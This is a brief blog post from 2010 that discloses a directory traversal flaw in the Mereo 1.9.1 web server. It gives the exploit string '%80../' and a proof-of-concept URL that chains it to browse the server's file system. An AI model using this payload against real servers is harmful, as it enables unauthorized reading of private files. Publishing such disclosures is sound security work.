It's possible to navigate the local file system of a server running Mereo 1.9.1 by using a specially crafted URL.
Exploit: %80../
PoC: http://localhost/%80../%80../%80../%80../%80../%80../%80../%80../
Sunday, May 9, 2010
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment